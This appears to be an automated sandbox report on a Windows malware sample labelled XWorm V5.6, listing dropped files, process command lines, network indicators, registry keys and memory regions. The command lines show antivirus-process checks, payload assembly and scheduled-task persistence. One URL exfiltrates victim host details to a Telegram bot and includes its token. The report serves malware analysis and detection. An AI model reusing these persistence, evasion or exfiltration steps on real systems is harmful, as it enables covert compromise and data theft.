Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
DA92phBHUS.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js
|
ASCII text, with no line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\438799\Dump.pif
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
modified
|
|
|
|
C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\m
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\438799\L
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe
|
PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\Flyer
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\Highlighted
|
ASCII text, with very long lines (304), with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\Highlighted.bat
|
ASCII text, with very long lines (304), with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\Intensity
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\Tale
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\Threat
|
OpenPGP Public Key
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\Turn
|
data
|
dropped
|
There are 4 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Users\user\Desktop\DA92phBHUS.exe
|
"C:\Users\user\Desktop\DA92phBHUS.exe"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c copy Highlighted Highlighted.bat & Highlighted.bat
|
|
|
|
C:\Windows\SysWOW64\findstr.exe
|
findstr /I "wrsa opssvc"
|
|
|
|
C:\Windows\SysWOW64\findstr.exe
|
findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
cmd /c md 438799
|
|
|
|
C:\Windows\SysWOW64\findstr.exe
|
findstr /V "pantyhoseyourslandscapesdisposition" Flyer
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
cmd /c copy /b ..\Turn + ..\Tale + ..\Intensity L
|
|
|
|
C:\Users\user\AppData\Local\Temp\438799\Dump.pif
|
Dump.pif L
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
cmd /c schtasks.exe /create /tn "Cdna" /tr "wscript //B 'C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js'"
/sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
|
|
|
|
C:\Windows\SysWOW64\schtasks.exe
|
schtasks.exe /create /tn "Cdna" /tr "wscript //B 'C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js'"
/sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
|
|
|
|
C:\Windows\SysWOW64\schtasks.exe
|
schtasks.exe /create /tn "ImageSyncProX" /tr "wscript //B 'C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js'"
/sc onlogon /F /RL HIGHEST
|
|
|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js"
|
|
|
|
C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr
|
"C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr" "C:\Users\user\AppData\Local\ImageSyncPro Innovations
Co\m"
|
|
|
|
C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe
|
C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\tasklist.exe
|
tasklist
|
||
|
C:\Windows\SysWOW64\tasklist.exe
|
tasklist
|
||
|
C:\Windows\SysWOW64\choice.exe
|
choice /d y /t 15
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 10 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://api.telegram
|
unknown
|
|
|
|
193.41.226.233
|
|
||
|
https://api.telegram.org
|
unknown
|
|
|
|
https://api.telegram.org/bot
|
unknown
|
|
|
|
https://api.telegram.org/bot7981465575:AAEW4gOQw1_KaLtAHUtM3Ol8vEbq1ghRfE0/sendMessage?chat_id=6795213026&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A3CE6FBAD6367EB17AE37%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20L9CBEH%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWORM%20v5.6
|
149.154.167.220
|
|
|
|
http://www.autoitscript.com/autoit3/J
|
unknown
|
||
|
http://nsis.sf.net/NSIS_ErrorError
|
unknown
|
||
|
http://api.telegram.org
|
unknown
|
||
|
https://www.autoitscript.com/autoit3/
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://api.telegram.org/bot7981465575:AAEW4gOQw1_KaLtAHUtM3Ol8vEbq1ghRfE0/sendMessage?chat_id=67952
|
unknown
|
There are 1 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
api.telegram.org
|
149.154.167.220
|
|
|
|
nAtuEYczbaU.nAtuEYczbaU
|
unknown
|
|
|
|
206.23.85.13.in-addr.arpa
|
unknown
|
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
149.154.167.220
|
api.telegram.org
|
United Kingdom
|
|
|
|
193.41.226.233
|
unknown
|
unknown
|
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
|
JScriptSetScriptStateStarted
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegAsm_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegAsm_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegAsm_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegAsm_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegAsm_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegAsm_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegAsm_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegAsm_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegAsm_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegAsm_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegAsm_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegAsm_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegAsm_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegAsm_RASMANCS
|
FileDirectory
|
There are 6 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
14C0000
|
trusted library allocation
|
page read and write
|
|
|
|
14B2000
|
trusted library allocation
|
page read and write
|
|
|
|
1032000
|
remote allocation
|
page execute and read and write
|
|
|
|
303A000
|
trusted library allocation
|
page read and write
|
|
|
|
1473000
|
heap
|
page read and write
|
|
|
|
14B6000
|
trusted library allocation
|
page read and write
|
|
|
|
151C000
|
trusted library allocation
|
page read and write
|
|
|
|
1513000
|
trusted library allocation
|
page read and write
|
|
|
|
1527000
|
trusted library allocation
|
page read and write
|
|
|
|
ED9000
|
heap
|
page read and write
|
||
|
27F48580000
|
heap
|
page read and write
|
||
|
50FE000
|
stack
|
page read and write
|
||
|
DCD000
|
heap
|
page read and write
|
||
|
1500000
|
trusted library allocation
|
page read and write
|
||
|
678B000
|
heap
|
page read and write
|
||
|
27F485EC000
|
heap
|
page read and write
|
||
|
7B1000
|
heap
|
page read and write
|
||
|
676D000
|
stack
|
page read and write
|
||
|
1517000
|
heap
|
page read and write
|
||
|
2829000
|
heap
|
page read and write
|
||
|
FC5000
|
heap
|
page read and write
|
||
|
D3E000
|
heap
|
page read and write
|
||
|
3006000
|
trusted library allocation
|
page read and write
|
||
|
7430000
|
heap
|
page read and write
|
||
|
F0B000
|
heap
|
page read and write
|
||
|
9DB000
|
stack
|
page read and write
|
||
|
33D9000
|
heap
|
page read and write
|
||
|
27F485B6000
|
heap
|
page read and write
|
||
|
3881000
|
heap
|
page read and write
|
||
|
5A3F000
|
stack
|
page read and write
|
||
|
7CF000
|
heap
|
page read and write
|
||
|
FA4000
|
heap
|
page read and write
|
||
|
107F000
|
heap
|
page read and write
|
||
|
2825000
|
heap
|
page read and write
|
||
|
3881000
|
heap
|
page read and write
|
||
|
E3A000
|
heap
|
page read and write
|
||
|
E28000
|
heap
|
page read and write
|
||
|
7A8000
|
heap
|
page read and write
|
||
|
523F000
|
stack
|
page read and write
|
||
|
FE1000
|
heap
|
page read and write
|
||
|
4021000
|
trusted library allocation
|
page read and write
|
||
|
79C000
|
heap
|
page read and write
|
||
|
E0A000
|
heap
|
page read and write
|
||
|
ED0000
|
unkown
|
page readonly
|
||
|
6ECD000
|
stack
|
page read and write
|
||
|
5520000
|
trusted library allocation
|
page read and write
|
||
|
F3C000
|
heap
|
page read and write
|
||
|
307C000
|
heap
|
page read and write
|
||
|
1590000
|
trusted library allocation
|
page read and write
|
||
|
3881000
|
heap
|
page read and write
|
||
|
F2A000
|
heap
|
page read and write
|
||
|
EBA000
|
heap
|
page read and write
|
||
|
D8F1FFE000
|
stack
|
page read and write
|
||
|
E09000
|
heap
|
page read and write
|
||
|
275E000
|
stack
|
page read and write
|
||
|
722D000
|
stack
|
page read and write
|
||
|
D92000
|
heap
|
page read and write
|
||
|
1443000
|
trusted library allocation
|
page execute and read and write
|
||
|
E9E000
|
heap
|
page read and write
|
||
|
7C7000
|
heap
|
page read and write
|
||
|
307C000
|
heap
|
page read and write
|
||
|
520000
|
heap
|
page read and write
|
||
|
3881000
|
heap
|
page read and write
|
||
|
4FC000
|
stack
|
page read and write
|
||
|
79C000
|
heap
|
page read and write
|
||
|
7BE000
|
heap
|
page read and write
|
||
|
1483000
|
heap
|
page read and write
|
||
|
27F485DC000
|
heap
|
page read and write
|
||
|
D53000
|
heap
|
page read and write
|
||
|
1444000
|
trusted library allocation
|
page read and write
|
||
|
585000
|
heap
|
page read and write
|
||
|
CE0000
|
heap
|
page read and write
|
||
|
7C5000
|
heap
|
page read and write
|
||
|
D2F000
|
heap
|
page read and write
|
||
|
79E000
|
heap
|
page read and write
|
||
|
11C5000
|
heap
|
page read and write
|
||
|
DCB000
|
heap
|
page read and write
|
||
|
E73000
|
heap
|
page read and write
|
||
|
54E0000
|
trusted library allocation
|
page read and write
|
||
|
D88000
|
heap
|
page read and write
|
||
|
3881000
|
heap
|
page read and write
|
||
|
3881000
|
heap
|
page read and write
|
||
|
2F0000
|
unkown
|
page readonly
|
||
|
E40000
|
unkown
|
page readonly
|
||
|
7BE000
|
heap
|
page read and write
|
||
|
1590000
|
trusted library allocation
|
page read and write
|
||
|
3F0000
|
heap
|
page read and write
|
||
|
4E90000
|
heap
|
page read and write
|
||
|
32FF000
|
stack
|
page read and write
|
||
|
F92000
|
heap
|
page read and write
|
||
|
C7C000
|
stack
|
page read and write
|
||
|
33D9000
|
heap
|
page read and write
|
||
|
EB4000
|
heap
|
page read and write
|
||
|
3881000
|
heap
|
page read and write
|
||
|
2F0000
|
unkown
|
page readonly
|
||
|
DCB000
|
heap
|
page read and write
|
||
|
102B000
|
heap
|
page read and write
|
||
|
16DD000
|
trusted library allocation
|
page read and write
|
||
|
EDF000
|
heap
|
page read and write
|
||
|
1387000
|
heap
|
page read and write
|
||
|
ED0000
|
unkown
|
page readonly
|
||
|
629C000
|
stack
|
page read and write
|
||
|
D53000
|
heap
|
page read and write
|
||
|
F41000
|
heap
|
page read and write
|
||
|
6C7E000
|
stack
|
page read and write
|
||
|
7BE000
|
heap
|
page read and write
|
||
|
6B3E000
|
stack
|
page read and write
|
||
|
1466000
|
trusted library allocation
|
page execute and read and write
|
||
|
3060000
|
heap
|
page read and write
|
||
|
68E000
|
stack
|
page read and write
|
||
|
6D7E000
|
stack
|
page read and write
|
||
|
306A000
|
heap
|
page read and write
|
||
|
320E000
|
stack
|
page read and write
|
||
|
9CE000
|
stack
|
page read and write
|
||
|
3038000
|
trusted library allocation
|
page read and write
|
||
|
FEC000
|
heap
|
page read and write
|
||
|
747C000
|
stack
|
page read and write
|
||
|
EA5000
|
heap
|
page read and write
|
||
|
1440000
|
heap
|
page read and write
|
||
|
4F4000
|
unkown
|
page readonly
|
||
|
3018000
|
trusted library allocation
|
page read and write
|
||
|
C52000
|
unkown
|
page readonly
|
||
|
E4D000
|
heap
|
page read and write
|
||
|
3072000
|
heap
|
page read and write
|
||
|
305D000
|
heap
|
page read and write
|
||
|
5550000
|
heap
|
page read and write
|
||
|
E14000
|
heap
|
page read and write
|
||
|
3881000
|
heap
|
page read and write
|
||
|
1490000
|
trusted library allocation
|
page read and write
|
||
|
113A000
|
heap
|
page read and write
|
||
|
3881000
|
heap
|
page read and write
|
||
|
304D000
|
trusted library allocation
|
page read and write
|
||
|
E10000
|
heap
|
page read and write
|
||
|
3881000
|
heap
|
page read and write
|
||
|
D8F21FF000
|
stack
|
page read and write
|
||
|
E0E000
|
heap
|
page read and write
|
||
|
FB3000
|
heap
|
page read and write
|
||
|
27F485CB000
|
heap
|
page read and write
|
||
|
794E000
|
stack
|
page read and write
|
||
|
131F000
|
heap
|
page read and write
|
||
|
1061000
|
heap
|
page read and write
|
||
|
2FFD000
|
trusted library allocation
|
page read and write
|
||
|
DAE000
|
heap
|
page read and write
|
||
|
2ECF000
|
unkown
|
page read and write
|
||
|
F3C000
|
heap
|
page read and write
|
||
|
2828000
|
heap
|
page read and write
|
||
|
E41000
|
heap
|
page read and write
|
||
|
E14000
|
heap
|
page read and write
|
||
|
1430000
|
trusted library allocation
|
page read and write
|
||
|
7AD000
|
heap
|
page read and write
|
||
|
3038000
|
heap
|
page read and write
|
||
|
67E3000
|
heap
|
page read and write
|
||
|
19A000
|
stack
|
page read and write
|
||
|
1060000
|
trusted library allocation
|
page read and write
|
||
|
294D000
|
stack
|
page read and write
|
||
|
1321000
|
heap
|
page read and write
|
||
|
DAE000
|
heap
|
page read and write
|
||
|
780E000
|
stack
|
page read and write
|
||
|
6CF000
|
stack
|
page read and write
|
||
|
33D9000
|
heap
|
page read and write
|
||
|
DCB000
|
heap
|
page read and write
|
||
|
13D8000
|
heap
|
page read and write
|
||
|
2EEE000
|
stack
|
page read and write
|
||
|
760000
|
heap
|
page read and write
|
||
|
6780000
|
heap
|
page read and write
|
||
|
1590000
|
trusted library allocation
|
page read and write
|
||
|
CBC000
|
stack
|
page read and write
|
||
|
3053000
|
trusted library allocation
|
page read and write
|
||
|
7A8000
|
heap
|
page read and write
|
||
|
144D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1060000
|
trusted library allocation
|
page read and write
|
||
|
7AD000
|
heap
|
page read and write
|
||
|
C3E000
|
stack
|
page read and write
|
||
|
3042000
|
trusted library allocation
|
page read and write
|
||
|
2BF0000
|
heap
|
page read and write
|
||
|
2EF0000
|
heap
|
page read and write
|
||
|
27F485E4000
|
heap
|
page read and write
|
||
|
FEB000
|
heap
|
page read and write
|
||
|
2FA0000
|
trusted library allocation
|
page read and write
|
||
|
3881000
|
heap
|
page read and write
|
||
|
14B0000
|
trusted library allocation
|
page read and write
|
||
|
3881000
|
heap
|
page read and write
|
||
|
54D9000
|
trusted library allocation
|
page read and write
|
||
|
BA4000
|
heap
|
page read and write
|
||
|
1014000
|
heap
|
page read and write
|
||
|
1086000
|
heap
|
page read and write
|
||
|
12E0000
|
heap
|
page read and write
|
||
|
D62000
|
heap
|
page read and write
|
||
|
DDE000
|
heap
|
page read and write
|
||
|
1003000
|
heap
|
page read and write
|
||
|
E28000
|
heap
|
page read and write
|
||
|
1265000
|
heap
|
page read and write
|
||
|
E14000
|
heap
|
page read and write
|
||
|
587E000
|
stack
|
page read and write
|
||
|
3014000
|
trusted library allocation
|
page read and write
|
||
|
DA2000
|
heap
|
page read and write
|
||
|
3881000
|
heap
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
3880000
|
heap
|
page read and write
|
||
|
27F4859C000
|
heap
|
page read and write
|
||
|
3881000
|
heap
|
page read and write
|
||
|
2F1000
|
unkown
|
page execute read
|
||
|
9BF000
|
stack
|
page read and write
|
||
|
11C0000
|
heap
|
page read and write
|
||
|
E14000
|
heap
|
page read and write
|
||
|
DCB000
|
heap
|
page read and write
|
||
|
3B0000
|
unkown
|
page read and write
|
||
|
324F000
|
stack
|
page read and write
|
||
|
33BD000
|
heap
|
page read and write
|
||
|
7C7000
|
heap
|
page read and write
|
||
|
2EFE000
|
stack
|
page read and write
|
||
|
150F000
|
stack
|
page read and write
|
||
|
54AE000
|
trusted library allocation
|
page read and write
|
||
|
3881000
|
heap
|
page read and write
|
||
|
3630000
|
heap
|
page read and write
|
||
|
1435000
|
heap
|
page read and write
|
||
|
27F48500000
|
heap
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
7C4000
|
heap
|
page read and write
|
||
|
7BE000
|
heap
|
page read and write
|
||
|
E4F000
|
heap
|
page read and write
|
||
|
3060000
|
heap
|
page read and write
|
||
|
33DE000
|
stack
|
page read and write
|
||
|
2FC0000
|
heap
|
page read and write
|
||
|
336E000
|
stack
|
page read and write
|
||
|
580000
|
heap
|
page read and write
|
||
|
D9B000
|
heap
|
page read and write
|
||
|
E14000
|
heap
|
page read and write
|
||
|
7BE000
|
heap
|
page read and write
|
||
|
27F48900000
|
heap
|
page read and write
|
||
|
3078000
|
heap
|
page read and write
|
||
|
F62000
|
heap
|
page read and write
|
||
|
306C000
|
trusted library allocation
|
page read and write
|
||
|
89E000
|
stack
|
page read and write
|
||
|
3060000
|
heap
|
page read and write
|
||
|
1590000
|
trusted library allocation
|
page read and write
|
||
|
D8F000
|
heap
|
page read and write
|
||
|
2EF5000
|
heap
|
page read and write
|
||
|
E14000
|
heap
|
page read and write
|
||
|
1060000
|
heap
|
page read and write
|
||
|
27F485CD000
|
heap
|
page read and write
|
||
|
3F6F000
|
stack
|
page read and write
|
||
|
6D0000
|
heap
|
page read and write
|
||
|
1060000
|
trusted library allocation
|
page read and write
|
||
|
E14000
|
heap
|
page read and write
|
||
|
3C11000
|
trusted library allocation
|
page read and write
|
||
|
E51000
|
heap
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
5700000
|
heap
|
page read and write
|
||
|
3881000
|
heap
|
page read and write
|
||
|
3881000
|
heap
|
page read and write
|
||
|
7AD000
|
heap
|
page read and write
|
||
|
3221000
|
heap
|
page read and write
|
||
|
EF7000
|
heap
|
page read and write
|
||
|
E14000
|
heap
|
page read and write
|
||
|
3CC6000
|
trusted library allocation
|
page read and write
|
||
|
102A000
|
heap
|
page read and write
|
||
|
271E000
|
stack
|
page read and write
|
||
|
7B1000
|
heap
|
page read and write
|
||
|
10B8000
|
heap
|
page read and write
|
||
|
12E8000
|
heap
|
page read and write
|
||
|
DF7000
|
stack
|
page read and write
|
||
|
3881000
|
heap
|
page read and write
|
||
|
1369000
|
heap
|
page read and write
|
||
|
1071000
|
heap
|
page read and write
|
||
|
DB2000
|
heap
|
page read and write
|
||
|
F22000
|
heap
|
page read and write
|
||
|
1462000
|
trusted library allocation
|
page read and write
|
||
|
F8E000
|
heap
|
page read and write
|
||
|
3B0000
|
unkown
|
page write copy
|
||
|
5496000
|
trusted library allocation
|
page read and write
|
||
|
1059000
|
heap
|
page read and write
|
||
|
1590000
|
trusted library allocation
|
page read and write
|
||
|
10B0000
|
heap
|
page read and write
|
||
|
BA4000
|
heap
|
page read and write
|
||
|
14E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7C7000
|
heap
|
page read and write
|
||
|
306A000
|
heap
|
page read and write
|
||
|
1590000
|
trusted library allocation
|
page read and write
|
||
|
3265000
|
heap
|
page read and write
|
||
|
BA4000
|
heap
|
page read and write
|
||
|
F00000
|
unkown
|
page write copy
|
||
|
3881000
|
heap
|
page read and write
|
||
|
879000
|
stack
|
page read and write
|
||
|
E09000
|
heap
|
page read and write
|
||
|
33EA000
|
heap
|
page read and write
|
||
|
51FE000
|
stack
|
page read and write
|
||
|
E73000
|
heap
|
page read and write
|
||
|
1590000
|
trusted library allocation
|
page read and write
|
||
|
43AF000
|
stack
|
page read and write
|
||
|
1061000
|
heap
|
page read and write
|
||
|
11BE000
|
stack
|
page read and write
|
||
|
E77000
|
heap
|
page read and write
|
||
|
2160000
|
heap
|
page read and write
|
||
|
F04000
|
unkown
|
page write copy
|
||
|
EF6000
|
unkown
|
page readonly
|
||
|
3660000
|
heap
|
page read and write
|
||
|
3A6000
|
unkown
|
page readonly
|
||
|
E8B000
|
heap
|
page read and write
|
||
|
54A2000
|
trusted library allocation
|
page read and write
|
||
|
1060000
|
trusted library allocation
|
page read and write
|
||
|
FE1000
|
heap
|
page read and write
|
||
|
5C7E000
|
stack
|
page read and write
|
||
|
F62000
|
heap
|
page read and write
|
||
|
27F485B6000
|
heap
|
page read and write
|
||
|
DC0000
|
direct allocation
|
page execute and read and write
|
||
|
FBC000
|
heap
|
page read and write
|
||
|
F09000
|
unkown
|
page readonly
|
||
|
5553000
|
heap
|
page read and write
|
||
|
145D000
|
trusted library allocation
|
page execute and read and write
|
||
|
E14000
|
heap
|
page read and write
|
||
|
33BD000
|
heap
|
page read and write
|
||
|
1003000
|
heap
|
page read and write
|
||
|
4ACF000
|
heap
|
page read and write
|
||
|
76A000
|
heap
|
page read and write
|
||
|
547A000
|
stack
|
page read and write
|
||
|
1060000
|
trusted library allocation
|
page read and write
|
||
|
27F485E7000
|
heap
|
page read and write
|
||
|
1E0F000
|
stack
|
page read and write
|
||
|
757D000
|
stack
|
page read and write
|
||
|
513F000
|
stack
|
page read and write
|
||
|
530000
|
heap
|
page read and write
|
||
|
69FE000
|
stack
|
page read and write
|
||
|
3030000
|
trusted library allocation
|
page read and write
|
||
|
2F08000
|
trusted library allocation
|
page read and write
|
||
|
27F485A1000
|
heap
|
page read and write
|
||
|
C50000
|
unkown
|
page readonly
|
||
|
3BF6000
|
trusted library allocation
|
page read and write
|
||
|
BA4000
|
heap
|
page read and write
|
||
|
1590000
|
trusted library allocation
|
page read and write
|
||
|
3030000
|
heap
|
page read and write
|
||
|
16E0000
|
heap
|
page read and write
|
||
|
639C000
|
stack
|
page read and write
|
||
|
1349000
|
heap
|
page read and write
|
||
|
6823000
|
heap
|
page read and write
|
||
|
103C000
|
remote allocation
|
page execute and read and write
|
||
|
D53000
|
heap
|
page read and write
|
||
|
146E000
|
heap
|
page read and write
|
||
|
76BE000
|
stack
|
page read and write
|
||
|
4FFC000
|
stack
|
page read and write
|
||
|
2E9F000
|
stack
|
page read and write
|
||
|
40B000
|
unkown
|
page read and write
|
||
|
DFA000
|
heap
|
page read and write
|
||
|
7C7000
|
heap
|
page read and write
|
||
|
1035000
|
heap
|
page read and write
|
||
|
666E000
|
stack
|
page read and write
|
||
|
6791000
|
heap
|
page read and write
|
||
|
300F000
|
stack
|
page read and write
|
||
|
F16000
|
heap
|
page read and write
|
||
|
1060000
|
trusted library allocation
|
page read and write
|
||
|
C4E000
|
stack
|
page read and write
|
||
|
79C000
|
heap
|
page read and write
|
||
|
32BE000
|
stack
|
page read and write
|
||
|
79C000
|
heap
|
page read and write
|
||
|
E00000
|
heap
|
page read and write
|
||
|
79C000
|
heap
|
page read and write
|
||
|
2EA0000
|
heap
|
page read and write
|
||
|
E06000
|
heap
|
page read and write
|
||
|
2829000
|
heap
|
page read and write
|
||
|
E1F000
|
heap
|
page read and write
|
||
|
EF6000
|
unkown
|
page readonly
|
||
|
10AF000
|
heap
|
page read and write
|
||
|
ED9000
|
heap
|
page read and write
|
||
|
F5B000
|
heap
|
page read and write
|
||
|
F3B000
|
heap
|
page read and write
|
||
|
6490000
|
trusted library allocation
|
page read and write
|
||
|
3250000
|
heap
|
page read and write
|
||
|
27F485EC000
|
heap
|
page read and write
|
||
|
1064000
|
heap
|
page read and write
|
||
|
7A8000
|
heap
|
page read and write
|
||
|
7B1000
|
heap
|
page read and write
|
||
|
33A8000
|
heap
|
page read and write
|
||
|
CC0000
|
heap
|
page read and write
|
||
|
7A8000
|
heap
|
page read and write
|
||
|
7AD000
|
heap
|
page read and write
|
||
|
301E000
|
trusted library allocation
|
page read and write
|
||
|
DAD000
|
heap
|
page read and write
|
||
|
3B6E000
|
stack
|
page read and write
|
||
|
21FE000
|
stack
|
page read and write
|
||
|
6DCE000
|
stack
|
page read and write
|
||
|
EDB000
|
heap
|
page read and write
|
||
|
5480000
|
heap
|
page execute and read and write
|
||
|
3B9000
|
unkown
|
page readonly
|
||
|
E41000
|
unkown
|
page execute read
|
||
|
517E000
|
stack
|
page read and write
|
||
|
E80000
|
heap
|
page read and write
|
||
|
D9F000
|
heap
|
page read and write
|
||
|
72AD000
|
stack
|
page read and write
|
||
|
16D0000
|
trusted library allocation
|
page read and write
|
||
|
1070000
|
heap
|
page read and write
|
||
|
F62000
|
heap
|
page read and write
|
||
|
306D000
|
heap
|
page read and write
|
||
|
FF9000
|
heap
|
page read and write
|
||
|
C5C000
|
stack
|
page read and write
|
||
|
351C000
|
stack
|
page read and write
|
||
|
3881000
|
heap
|
page read and write
|
||
|
21B0000
|
heap
|
page read and write
|
||
|
79C000
|
heap
|
page read and write
|
||
|
3036000
|
trusted library allocation
|
page read and write
|
||
|
28EB000
|
heap
|
page read and write
|
||
|
7AD000
|
heap
|
page read and write
|
||
|
4E0E000
|
stack
|
page read and write
|
||
|
2F3E000
|
stack
|
page read and write
|
||
|
306A000
|
heap
|
page read and write
|
||
|
105A000
|
heap
|
page read and write
|
||
|
1030000
|
remote allocation
|
page execute and read and write
|
||
|
FA6000
|
heap
|
page read and write
|
||
|
31C0000
|
heap
|
page read and write
|
||
|
1060000
|
trusted library allocation
|
page read and write
|
||
|
C7C000
|
stack
|
page read and write
|
||
|
22D0000
|
heap
|
page read and write
|
||
|
141E000
|
stack
|
page read and write
|
||
|
54C2000
|
trusted library allocation
|
page read and write
|
||
|
DD5000
|
heap
|
page read and write
|
||
|
3220000
|
heap
|
page read and write
|
||
|
306E000
|
heap
|
page read and write
|
||
|
E2A000
|
heap
|
page read and write
|
||
|
D56000
|
heap
|
page read and write
|
||
|
149D000
|
heap
|
page read and write
|
||
|
DA2000
|
heap
|
page read and write
|
||
|
14BC000
|
trusted library allocation
|
page read and write
|
||
|
3881000
|
heap
|
page read and write
|
||
|
76E000
|
heap
|
page read and write
|
||
|
1450000
|
trusted library allocation
|
page read and write
|
||
|
E75000
|
heap
|
page read and write
|
||
|
2EF0000
|
heap
|
page read and write
|
||
|
F7E000
|
heap
|
page read and write
|
||
|
147B000
|
trusted library allocation
|
page execute and read and write
|
||
|
3668000
|
heap
|
page read and write
|
||
|
309C000
|
stack
|
page read and write
|
||
|
7AD000
|
heap
|
page read and write
|
||
|
1003000
|
heap
|
page read and write
|
||
|
2DFF000
|
stack
|
page read and write
|
||
|
1046000
|
heap
|
page read and write
|
||
|
1060000
|
trusted library allocation
|
page read and write
|
||
|
98000
|
stack
|
page read and write
|
||
|
3059000
|
trusted library allocation
|
page read and write
|
||
|
27F485A1000
|
heap
|
page read and write
|
||
|
27F485D9000
|
heap
|
page read and write
|
||
|
7B1000
|
heap
|
page read and write
|
||
|
6F0C000
|
stack
|
page read and write
|
||
|
41F000
|
unkown
|
page read and write
|
||
|
3881000
|
heap
|
page read and write
|
||
|
D8F1CFD000
|
stack
|
page read and write
|
||
|
3881000
|
heap
|
